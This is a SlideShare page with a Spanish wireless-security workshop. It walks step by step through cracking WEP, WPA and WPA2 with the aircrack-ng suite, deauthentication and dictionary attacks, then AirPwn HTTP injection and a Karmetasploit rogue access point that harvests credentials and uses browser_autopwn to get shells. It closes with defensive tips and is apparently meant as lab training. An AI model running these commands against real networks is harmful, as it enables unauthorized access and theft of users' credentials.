SlideShare une entreprise Scribd logo
1  sur  60
Télécharger pour lire hors ligne
Workshop Seguridad
Inalámbrica	

Jaime Andrés Restrepo
Agenda del Workshop	

• ¿Cuál es tu SSID?	

• ¿Porqué el WorkShop?	

• ¿Como vamos a trabajar?	

• Manos a la Obra!!
¿Cuál es tu SSID?	

Jaime	

Andrés	

María	

Valentina	

Jairo	

……
¿Por que el Workshop?	

• Gran porcentaje de implementaciones
inalámbricas.	

• Poco interés por la seguridad en redes
inalámbricas, en entornos caseros y
empresariales.	

• Desconocimiento de los problemas de
seguridad en redes inalámbricas
¿Cómo vamos a Trabajar?	

•  GRUPO II
SSID: (WEP-II, WEP-ST-II, WPA-II, WPA2-II)
Mac: F0:7D:68:52:AA:07	

•  GRUPO I
SSID: (WEP,WEP-ST,WPA,WPA2)
Mac: 00:1B:11:3A:B6:9D
Manos a la obra!!	

• Inicia la maquina virtual o
introduce el DVD	

• Ingresa el usuario root y clave
toor, luego startx	

• Conecta la memoria Wireless
USB, si la tienes.	

Si no tienes una tarjeta compatible.. No te preocupes
WEP
start-network	

iwconfig	

Iniciando la red y
configurando la
tarjeta
airmon-ng start wlan0	

Ponemos nuestra
tarjeta inalámbrica
en modo monitor.
airodump-ng mon0	

Iniciamos una
captura general de
trafico, para
identificar las redes
activas a las que
tenemos alcance.
Con los resultados
del comando
anterior, podemos
identificar varias
redes e información
que será muy
importante para
poder descifrar la
clave de la red
inalámbrica.
airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0	

Ponemos nuestra
tarjeta inalámbrica a
capturar la
información
especifica que nos
interesa, de la red
inalámbrica que
seleccionamos
anteriormente.
Iniciamos la
captura y
podemos ver los
usuarios
conectados,
cuantos paquetes
ha enviado y
capturamos esos
paquetes en el
archivo WEP.cap
aircrack-ng WEP-01.cap	

Ejecutamos el
aircrack para sacar la
clave de la red, que
se encuentra en los
paquetes que
capturamos
anteriormente.
Clave: weppw	

Clave en HEXA
En la anterior captura, es en
un entorno donde hay
clientes conectados y
haciendo uso de la red. 	

	

Pero… ¿y si no hay trafico?
Identificamos la red
que deseamos
auditar y obtenemos
la información que
será importante
para poder descifrar
la clave de la red
inalámbrica.
Si hay clientes pero no hay trafico	

Pocos datos	

Identificamos un
cliente conectado a
la red, pero no esta
navegando y no
conseguimos muchos
datos.
Pocos datos y solo 12 IVs (vector de
inicialización), necesitaremos al menos 5000	

Intentamos crackear
la clave con los pocos
paquetes que
logramos conseguir y
nos dice que
necesitamos muchos
mas paquetes ¿Qué
hacemos?
airodump-ng -c 6 --bssid MACROUTER -w WEP-ST mon0	

Como el cliente que
tenemos conectado
a la red, no esta
navegando, vamos a
capturar algún
paquete que envié el
cliente, suplantarlo y
reenviarlo muchas
veces trafico al
router.	

aireplay-ng -3 -b MACROUTER -h MACCLIENTE mon0
Logramos una buena cantidad de datos	

Conseguimos
capturar un paquete
del cliente y
repetirlo muchas
veces para generar
trafico suplantando
el cliente legitimo
ante el router.	

Paquetes que inyectamos
28059 IVs, contra 12 que teníamos….	

Después de inyectar
todos esos
paquetes, ya
contamos con los
suficientes vectores
para crackear la
clave como ya lo
hicimos
anteriormente.	

aircrack-ng WEP-ST-01.cap
¿Puedo automatizar
todos estos procesos?
cd /pentest/
wepbuster/	

./wepbuster	

Wesside-ng –i mon0	

WepBuster – Wesside-NG
WPA
airodump-ng mon0	

Iniciamos una
captura general de
trafico, para
identificar las redes
WPA activas a las
que tenemos
alcance.
Ponemos nuestra
tarjeta inalámbrica a
capturar la
información
especifica que nos
interesa, de la red
inalámbrica que
seleccionamos
anteriormente.	

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0
Iniciamos la
captura y
podemos ver los
usuarios
conectados,
cuantos paquetes
ha enviado y
capturamos esos
paquetes en el
archivo WPA.cap
Tenemos muy buenos datos, pero…	

Al ejecutar aircrack-ng WPA-01.cap,
nos encontramos con 0 handshake	

Como WPA se
crackea, por
fuerza bruta y no
descifrando la
clave como WEP,
no nos importa los
datos sino el
“apretón de
manos” inicial
entre el pc y el
router
(handshake)
Ponemos a capturar…	

airepaly-ng -0 1 –a MACROUTER –c MACCLIENTE mon0	

En esta ocasión lo que
nos importa es
capturar por la el
“apretón de manos”
donde se ponen de
acuerdo cliente y
servidor de la forma
en que trabajaran,
esta información la
usaremos para
crackear la clave wifi
por fuerza bruta.
aircrack-ng WPA-01.cap	

Lanzamos el
aircrack a el
archivo .cap
generado, para
verificar que
efectivamente
contemos con el
handshake
(apretón de
manos) y podemos
empezar a lanzar
el ataque de fuerza
bruta.
aircrack-ng -w /pentest/passwords/wordlists/wpa.txt
-b 00:1B:3A:B6:9D WPA-01.cap	

Lanzamos el
ataque de fuerza
bruta con el
diccionario que
trae incorporado el
backtrack y
esperamos que
alguna de las claves
que estén en el,
sea la del router.
Después de casi 14 minutos, obtenemos la clave del
router, que en este caso era !n5en5!7!v!7y	

KEY FOUND!,
encontramos la
clave de la red
WPA, después ya
que
afortunadamente
estaba en el
diccionario de
password que
utilizamos.
WPA2básicamente lo mismo que WPA
airodump-ng -c CANAL --bssid
MACROUTER -w NOMBRE
mon0	

airodump-ng mon0	

airepaly-ng -0 1 –a
MACROUTER –c
MACCLIENTE mon0
aircrack-ng -w /pentest/
passwords/wordlists/
darkc0de.lst -b 00:1B:
11:3A:B6:9D WPA2-01.cap	

Paramos el ataque de
des autenticación y
verificamos que
tenemos el handshake	

Iniciamos el crackeo de la
contraseña por fuerza bruta
Después de casi 2 horas, obtenemos la clave del
router, que en este caso era ecuatoriano	

KEY FOUND!,
encontramos la
clave de la red
WPA2, ya que
afortunadamente
estaba en el
diccionario de
password que
utilizamos.
¿Puedo automatizar
todos estos procesos?
WiFite Consola GUI
http://code.google.com/p/wifite/
Que hago después de
entrar a la red…
vacío	

admin
www.routerpasswords.com
Pero también podemos…	

• Escanear la red en busca de equipos con
información o vulnerables.	

• Lanzar un ataque ARP Spoofing para capturar
los datos que corren por esa red inalámbrica.	

• Usar su infraestructura, impresoras, conexión
a internet y aplicaciones locales.	

• Cualquier otra cosa que se nos ocurra…
EXTRAS
AirPwn
airpwn	

Framework
wireless que
permite inyectar
paquetes
entrantes, que
encajen con un
patrón que
definamos en el
archivo de
configuración.
airpwn –d DRIVER –i mon0
–k CLAVEWEPHEXA –c
CONFIGURACION –vvv -F	

Iniciamos la
herramienta con
una configuración
personalizada que
nos permitirá
reemplazar
cualquier petición
HTTP del cliente
por la nuestra.
Ataque en
ejecución.	

Resultado del
ataque
Karmetasploit
airmon-ng start wlan0	

Airbase-ng –P –C 30 –e ^”WPA” –v
mon0	

Ponemos nuestra
tarjeta en modo
monitor e
iniciamos un
accesspoint con un
essid conocido…
nano /etc/dhcp3/dhcpd.conf	

option domain-name-servers
10.0.0.1;	

	

default-lease-time 60;	

max-lease-time 72;	

	

ddns-update-style none;	

	

authoritative;	

	

log-facility local7;	

	

subnet 10.0.0.0 netmask
255.255.255.0 {	

range 10.0.0.100 10.0.0.254;	

option routers 10.0.0.1;	

option domain-name-servers
10.0.0.1;	

}
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0	

/etc/init.d/dhcp3-server
start
wget http://digitaloffense.net/tools/karma.rc	

./msfconsole –r karma.rc	

Descargamos el
karmetasploit de
la pagina oficial, lo
ejecutamos y
esperamos que
cargue
completamente
Oye tu
eres mi
red?	

Claro
yo soy
tu red	

Comunícame por
fa con
pop.hotmail.com	

Yo soy
pop.hotmail.com,
¿cual es tu usuario y
clave?	

Mi usuario es
inocencia y mi
clave 123456	

Muchas gracias
inocencia, espera yo
verifico tus datos	

Atacante	

 Victima
El resultado que veremos en los clientes
que se conecten a nuestro falso access
point, depende de los servicios que le
solicite el cliente al karmetasploit.	

	

Si solicita un cliente pop3,ftp,dns,smb,
simula ser uno y almacena los datos que
proporcione el cliente en la base de datos
karma.db	

	

Si hacemos una petición http en cambio
nos ejecuta el modulo browser_autopwn
del metasploit, para tratar de explotar
alguna vulnerabilidad en nuestro
navegador y conseguir una shell en el
sistema.
¿Como nos
protegemos?
¿Como podemos protégenos?	

•  Cambiar clave por defecto y SSID
(preferiblemente ocúltelo) al router	

•  Usar WPA o WPA2 con clave fuerte.	

•  Realizar Filtrado por Mac y limitar el numero
de conexiones	

•  Bajar la potencia a nuestro router	

•  Apagar el router cuando no
se utilice	

•  Usar pintura DefendAir
Cifrado: ???	

Cifrado: ???	

Cifrado: ???
Auditar redes inalámbricas WEP, WPA y WPA2

Contenu connexe

Tendances

Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAPaulo Colomés
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linuxNick Carter
 
La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...Jaime Sánchez
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodriarodri7703
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]RootedCON
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6davister
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
OpenVPN como solución de Redes Privadas Virtuales Corporativas
OpenVPN como solución de Redes Privadas Virtuales CorporativasOpenVPN como solución de Redes Privadas Virtuales Corporativas
OpenVPN como solución de Redes Privadas Virtuales CorporativasRommel León
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Proyecto2 sein
Proyecto2 seinProyecto2 sein
Proyecto2 seinPatriD
 
Hacking & Hardening Drupal
Hacking & Hardening DrupalHacking & Hardening Drupal
Hacking & Hardening Drupalzekivazquez
 
Cain & abel (sniffer)
Cain & abel (sniffer)Cain & abel (sniffer)
Cain & abel (sniffer)Tensor
 

Tendances (19)

Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPA
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linux
 
La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodri
 
Redeswifi ii
Redeswifi iiRedeswifi ii
Redeswifi ii
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Tutorial Instalacion Openvpn
Tutorial Instalacion OpenvpnTutorial Instalacion Openvpn
Tutorial Instalacion Openvpn
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Propietario
PropietarioPropietario
Propietario
 
OpenVPN como solución de Redes Privadas Virtuales Corporativas
OpenVPN como solución de Redes Privadas Virtuales CorporativasOpenVPN como solución de Redes Privadas Virtuales Corporativas
OpenVPN como solución de Redes Privadas Virtuales Corporativas
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Guía de configuracion Openvpn
Guía de configuracion OpenvpnGuía de configuracion Openvpn
Guía de configuracion Openvpn
 
Crackeando redes wep
Crackeando redes wepCrackeando redes wep
Crackeando redes wep
 
Proyecto2 sein
Proyecto2 seinProyecto2 sein
Proyecto2 sein
 
Hacking & Hardening Drupal
Hacking & Hardening DrupalHacking & Hardening Drupal
Hacking & Hardening Drupal
 
Cain & abel (sniffer)
Cain & abel (sniffer)Cain & abel (sniffer)
Cain & abel (sniffer)
 
Pentesting Basico
Pentesting BasicoPentesting Basico
Pentesting Basico
 

En vedette

Redinalambricas
RedinalambricasRedinalambricas
Redinalambricasjmeran
 
Inseguridad Redes Inalambricas
Inseguridad Redes InalambricasInseguridad Redes Inalambricas
Inseguridad Redes InalambricasJuan M Merlos
 
Introducción a la seguridad en redes inalámbricas
Introducción a la seguridad en redes inalámbricasIntroducción a la seguridad en redes inalámbricas
Introducción a la seguridad en redes inalámbricasMarcos Blanco Galán
 
Nueva Generación de Redes Wi-Fi Parte II
Nueva Generación de Redes Wi-Fi Parte IINueva Generación de Redes Wi-Fi Parte II
Nueva Generación de Redes Wi-Fi Parte IIJose Lazo
 
Seg wifi pre
Seg wifi preSeg wifi pre
Seg wifi preenroh1
 
Presentacion power point lan inalambrica
Presentacion power point lan inalambricaPresentacion power point lan inalambrica
Presentacion power point lan inalambricatatigarcia29
 
Curso Gratis Redes InaláMbricas
Curso Gratis Redes InaláMbricasCurso Gratis Redes InaláMbricas
Curso Gratis Redes InaláMbricasmax4221
 
05 introduccion a-las_redes_wi_fi-es-v2.3
05 introduccion a-las_redes_wi_fi-es-v2.305 introduccion a-las_redes_wi_fi-es-v2.3
05 introduccion a-las_redes_wi_fi-es-v2.3Diegofer88
 
Redes inalambricas
Redes inalambricasRedes inalambricas
Redes inalambricaserick ardila
 
Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...
Manual de hacker   131 trucos elhacker hacking webs, hack msn messenger 7, se...Manual de hacker   131 trucos elhacker hacking webs, hack msn messenger 7, se...
Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...kelvinst
 
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...Jaime Restrepo
 
Paginas de matematicas
Paginas de matematicasPaginas de matematicas
Paginas de matematicasespanol
 

En vedette (17)

Pag
PagPag
Pag
 
Redinalambricas
RedinalambricasRedinalambricas
Redinalambricas
 
Inseguridad Redes Inalambricas
Inseguridad Redes InalambricasInseguridad Redes Inalambricas
Inseguridad Redes Inalambricas
 
REDES...XD!
REDES...XD!REDES...XD!
REDES...XD!
 
Taller 01 teoria
Taller 01 teoriaTaller 01 teoria
Taller 01 teoria
 
Introducción a la seguridad en redes inalámbricas
Introducción a la seguridad en redes inalámbricasIntroducción a la seguridad en redes inalámbricas
Introducción a la seguridad en redes inalámbricas
 
Nueva Generación de Redes Wi-Fi Parte II
Nueva Generación de Redes Wi-Fi Parte IINueva Generación de Redes Wi-Fi Parte II
Nueva Generación de Redes Wi-Fi Parte II
 
Seg wifi pre
Seg wifi preSeg wifi pre
Seg wifi pre
 
Presentacion power point lan inalambrica
Presentacion power point lan inalambricaPresentacion power point lan inalambrica
Presentacion power point lan inalambrica
 
Curso Gratis Redes InaláMbricas
Curso Gratis Redes InaláMbricasCurso Gratis Redes InaláMbricas
Curso Gratis Redes InaláMbricas
 
05 introduccion a-las_redes_wi_fi-es-v2.3
05 introduccion a-las_redes_wi_fi-es-v2.305 introduccion a-las_redes_wi_fi-es-v2.3
05 introduccion a-las_redes_wi_fi-es-v2.3
 
Seguridad Wifi
Seguridad WifiSeguridad Wifi
Seguridad Wifi
 
Redes inalambricas
Redes inalambricasRedes inalambricas
Redes inalambricas
 
Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...
Manual de hacker   131 trucos elhacker hacking webs, hack msn messenger 7, se...Manual de hacker   131 trucos elhacker hacking webs, hack msn messenger 7, se...
Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...
 
Tema 8
Tema 8Tema 8
Tema 8
 
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
 
Paginas de matematicas
Paginas de matematicasPaginas de matematicas
Paginas de matematicas
 

Similaire à Auditar redes inalámbricas WEP, WPA y WPA2

Similaire à Auditar redes inalámbricas WEP, WPA y WPA2 (20)

Hacking wireless by Alberto García
Hacking wireless by Alberto GarcíaHacking wireless by Alberto García
Hacking wireless by Alberto García
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
Backtrack 3 manual
Backtrack 3 manualBacktrack 3 manual
Backtrack 3 manual
 
Aircrack ng: comandos básicos
Aircrack ng: comandos básicosAircrack ng: comandos básicos
Aircrack ng: comandos básicos
 
Qué es wep
Qué es wepQué es wep
Qué es wep
 
Ataque y defensa en redes Wi-Fi
Ataque y defensa en redes Wi-FiAtaque y defensa en redes Wi-Fi
Ataque y defensa en redes Wi-Fi
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploit
 
Backtrack 3
Backtrack 3Backtrack 3
Backtrack 3
 
Flisol Airacrack-ng
Flisol Airacrack-ng Flisol Airacrack-ng
Flisol Airacrack-ng
 
Manual De Wifiway
Manual De WifiwayManual De Wifiway
Manual De Wifiway
 
Procedimiento wifiway0.8wifislax3.1[1]
Procedimiento wifiway0.8wifislax3.1[1]Procedimiento wifiway0.8wifislax3.1[1]
Procedimiento wifiway0.8wifislax3.1[1]
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Backtrack 5
Backtrack 5Backtrack 5
Backtrack 5
 
Backtrack 5
Backtrack 5Backtrack 5
Backtrack 5
 
Crack redes wifi
Crack redes wifiCrack redes wifi
Crack redes wifi
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-cracking
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-cracking
 
inSEGURIDADE EN REDES WIFI
inSEGURIDADE EN REDES WIFIinSEGURIDADE EN REDES WIFI
inSEGURIDADE EN REDES WIFI
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
 
Taller SITEC 2010
Taller SITEC 2010Taller SITEC 2010
Taller SITEC 2010
 

Plus de Jaime Restrepo

I Know You ( iKy OSINT Tool )
I Know You ( iKy OSINT Tool )I Know You ( iKy OSINT Tool )
I Know You ( iKy OSINT Tool )Jaime Restrepo
 
i fought the law and the law lost
i fought the law and the law losti fought the law and the law lost
i fought the law and the law lostJaime Restrepo
 
How to build a powerfull open source soc4
How to build a powerfull open source soc4How to build a powerfull open source soc4
How to build a powerfull open source soc4Jaime Restrepo
 
Zer 0 no zer(0 day) dragon jar
Zer 0 no zer(0 day)   dragon jarZer 0 no zer(0 day)   dragon jar
Zer 0 no zer(0 day) dragon jarJaime Restrepo
 
Alta seguridad para clusters críticos
Alta seguridad para clusters críticosAlta seguridad para clusters críticos
Alta seguridad para clusters críticosJaime Restrepo
 
Bogotá Wardriving (Spanish)
Bogotá Wardriving (Spanish)Bogotá Wardriving (Spanish)
Bogotá Wardriving (Spanish)Jaime Restrepo
 
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...Jaime Restrepo
 
WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)Jaime Restrepo
 
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/LinuxHunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/LinuxJaime Restrepo
 
Hackeando el mundo exterior a través de Bluetooth Low-Energy
Hackeando el mundo exterior a través de Bluetooth Low-EnergyHackeando el mundo exterior a través de Bluetooth Low-Energy
Hackeando el mundo exterior a través de Bluetooth Low-EnergyJaime Restrepo
 
Memorias perito vol_7_dragonjar_con
Memorias perito vol_7_dragonjar_conMemorias perito vol_7_dragonjar_con
Memorias perito vol_7_dragonjar_conJaime Restrepo
 
Cloud native security en tiempo de coronavirus dragon jar
Cloud native security en tiempo de coronavirus dragon jarCloud native security en tiempo de coronavirus dragon jar
Cloud native security en tiempo de coronavirus dragon jarJaime Restrepo
 
Analysis of time windows to detect botnets behaviours
Analysis of time windows to detect botnets behavioursAnalysis of time windows to detect botnets behaviours
Analysis of time windows to detect botnets behavioursJaime Restrepo
 
Bug Bounty Experiences (Spanish)
Bug Bounty Experiences (Spanish)Bug Bounty Experiences (Spanish)
Bug Bounty Experiences (Spanish)Jaime Restrepo
 
Threat intel malware_analysis
Threat intel malware_analysisThreat intel malware_analysis
Threat intel malware_analysisJaime Restrepo
 
Bugbounty en Español, todo lo que no te han dicho
Bugbounty en Español, todo lo que no te han dichoBugbounty en Español, todo lo que no te han dicho
Bugbounty en Español, todo lo que no te han dichoJaime Restrepo
 
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el TerrorismoTécnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el TerrorismoJaime Restrepo
 
Gestión del tiempo en tiempos del COVID-19
Gestión del tiempo en tiempos del COVID-19Gestión del tiempo en tiempos del COVID-19
Gestión del tiempo en tiempos del COVID-19Jaime Restrepo
 
CSRF: El "Nuevo" Target - Juan David Castro
CSRF: El "Nuevo" Target - Juan David CastroCSRF: El "Nuevo" Target - Juan David Castro
CSRF: El "Nuevo" Target - Juan David CastroJaime Restrepo
 
Ya están aquí, seguridad fisica - DragonJAR Security Conference 2014
Ya están aquí, seguridad fisica - DragonJAR Security Conference 2014Ya están aquí, seguridad fisica - DragonJAR Security Conference 2014
Ya están aquí, seguridad fisica - DragonJAR Security Conference 2014Jaime Restrepo
 

Plus de Jaime Restrepo (20)

I Know You ( iKy OSINT Tool )
I Know You ( iKy OSINT Tool )I Know You ( iKy OSINT Tool )
I Know You ( iKy OSINT Tool )
 
i fought the law and the law lost
i fought the law and the law losti fought the law and the law lost
i fought the law and the law lost
 
How to build a powerfull open source soc4
How to build a powerfull open source soc4How to build a powerfull open source soc4
How to build a powerfull open source soc4
 
Zer 0 no zer(0 day) dragon jar
Zer 0 no zer(0 day)   dragon jarZer 0 no zer(0 day)   dragon jar
Zer 0 no zer(0 day) dragon jar
 
Alta seguridad para clusters críticos
Alta seguridad para clusters críticosAlta seguridad para clusters críticos
Alta seguridad para clusters críticos
 
Bogotá Wardriving (Spanish)
Bogotá Wardriving (Spanish)Bogotá Wardriving (Spanish)
Bogotá Wardriving (Spanish)
 
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
 
WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)
 
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/LinuxHunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
 
Hackeando el mundo exterior a través de Bluetooth Low-Energy
Hackeando el mundo exterior a través de Bluetooth Low-EnergyHackeando el mundo exterior a través de Bluetooth Low-Energy
Hackeando el mundo exterior a través de Bluetooth Low-Energy
 
Memorias perito vol_7_dragonjar_con
Memorias perito vol_7_dragonjar_conMemorias perito vol_7_dragonjar_con
Memorias perito vol_7_dragonjar_con
 
Cloud native security en tiempo de coronavirus dragon jar
Cloud native security en tiempo de coronavirus dragon jarCloud native security en tiempo de coronavirus dragon jar
Cloud native security en tiempo de coronavirus dragon jar
 
Analysis of time windows to detect botnets behaviours
Analysis of time windows to detect botnets behavioursAnalysis of time windows to detect botnets behaviours
Analysis of time windows to detect botnets behaviours
 
Bug Bounty Experiences (Spanish)
Bug Bounty Experiences (Spanish)Bug Bounty Experiences (Spanish)
Bug Bounty Experiences (Spanish)
 
Threat intel malware_analysis
Threat intel malware_analysisThreat intel malware_analysis
Threat intel malware_analysis
 
Bugbounty en Español, todo lo que no te han dicho
Bugbounty en Español, todo lo que no te han dichoBugbounty en Español, todo lo que no te han dicho
Bugbounty en Español, todo lo que no te han dicho
 
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el TerrorismoTécnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
 
Gestión del tiempo en tiempos del COVID-19
Gestión del tiempo en tiempos del COVID-19Gestión del tiempo en tiempos del COVID-19
Gestión del tiempo en tiempos del COVID-19
 
CSRF: El "Nuevo" Target - Juan David Castro
CSRF: El "Nuevo" Target - Juan David CastroCSRF: El "Nuevo" Target - Juan David Castro
CSRF: El "Nuevo" Target - Juan David Castro
 
Ya están aquí, seguridad fisica - DragonJAR Security Conference 2014
Ya están aquí, seguridad fisica - DragonJAR Security Conference 2014Ya están aquí, seguridad fisica - DragonJAR Security Conference 2014
Ya están aquí, seguridad fisica - DragonJAR Security Conference 2014
 

Dernier

Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
Excel (1) tecnologia.pdf trabajo Excel taller
Excel  (1) tecnologia.pdf trabajo Excel tallerExcel  (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerValentinaTabares11
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
Explorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramExplorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramDIDIERFERNANDOGUERRE
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfjeondanny1997
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxGESTECPERUSAC
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
